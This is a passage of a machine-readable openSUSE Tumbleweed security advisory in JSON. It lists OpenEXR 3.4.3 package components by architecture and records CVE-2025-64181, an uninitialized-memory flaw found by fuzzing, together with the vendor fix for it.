        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64"
        },
        "product_reference": "libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64"
        },
        "product_reference": "openexr-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le"
        },
        "product_reference": "openexr-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x"
        },
        "product_reference": "openexr-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64"
        },
        "product_reference": "openexr-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-devel-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64"
        },
        "product_reference": "openexr-devel-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-devel-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le"
        },
        "product_reference": "openexr-devel-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-devel-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x"
        },
        "product_reference": "openexr-devel-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-devel-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64"
        },
        "product_reference": "openexr-devel-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-doc-3.4.3-1.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64"
        },
        "product_reference": "openexr-doc-3.4.3-1.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-doc-3.4.3-1.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le"
        },
        "product_reference": "openexr-doc-3.4.3-1.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-doc-3.4.3-1.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x"
        },
        "product_reference": "openexr-doc-3.4.3-1.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "openexr-doc-3.4.3-1.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
        },
        "product_reference": "openexr-doc-3.4.3-1.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2025-64181",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2025-64181"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. In versions 3.3.0 through 3.3.5 and 3.4.0 through 3.4.2, while fuzzing `openexr_exrcheck_fuzzer`, Valgrind reports a conditional branch depending on uninitialized data inside `generic_unpack`. This indicates a use of uninitialized memory. The issue can result in undefined behavior and/or a potential crash/denial of service. Versions 3.3.6 and 3.4.3 fix the issue.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.ppc64le",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.s390x",
          "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2025-64181",
          "url": "https://www.suse.com/security/cve/CVE-2025-64181"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1253233 for CVE-2025-64181",
          "url": "https://bugzilla.suse.com/1253233"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIex-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libIlmThread-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXR-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRCore-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-32bit-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:libOpenEXRUtil-3_4-33-x86-64-v3-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.aarch64",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.ppc64le",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.s390x",
            "openSUSE Tumbleweed:openexr-devel-3.4.3-1.1.x86_64",
            "openSUSE Tumbleweed:openexr-doc-3.4.3-1.1.aarch64",
